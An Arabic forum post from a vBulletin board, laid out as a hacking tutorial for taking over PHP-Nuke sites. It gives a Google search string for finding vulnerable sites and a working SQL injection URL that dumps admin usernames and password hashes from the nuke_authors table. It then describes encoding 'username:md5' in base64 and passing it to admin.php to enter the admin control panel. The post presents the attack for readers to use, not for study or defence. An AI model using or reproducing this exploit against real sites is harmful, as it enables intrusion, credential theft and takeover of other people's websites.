|
شرح اختراق مجلة نيوك والسيطرة عليها
بسم الله الرحمن الرحيم
اختراق مجله nuke طبع الثغره قديمه وفعاله الى الان الثغره من نوع sql-injection في هذا المره مش راح نشفر وطبعا بستطاعتك التشفير والحصول على الباس ولاكن احنا راح نقوم بتحويل اسم المستخدم والباس المشفر الى base64 ومن ثم الحصول على تصريح لدخول الى لوحه التحكم الدمن يالله نبدأ الرجاء الحار متابعه الصور جيدا وعدم وضع اسئله سخيفه طريقه البحث قوقلي اكتب الكود الاتي كود: كود بلغة HTML:
in url :"modules.php?name=Web_Links"الصوره الاولى هنا قمت بوضع الكود الاتي والحصول على اسم المستخدم الي هو الادمن رقم واحد كود بلغة HTML:
modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20F ROM%20nuke_authors%20-- \\loginsهنا نقوم بتحويل الاسم والباس الى base64 وتستطيع عمل ذالك على اي موقع توجد به هذه الخدمه او اي برنامج username:md5 الصوره الرابعه هنا قمت بأضافه الكود الناتج الي هوbase64 بعد الوصله و admin.php?admin=base64 وسوف تكون في قلب لوحه التحكم ان شاء الله طبعا هنا موقع اخر لانو الاول في مشكله في لوحه التحكم |
| الساعة الآن 03:29 PM |
Powered by vBulletin® Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
HêĽм √ 3.1 BY: ! ωαнαм ! © 2010
جميع الحقوق محفوظة © لأكاديمية العرضة الجنوبية رباع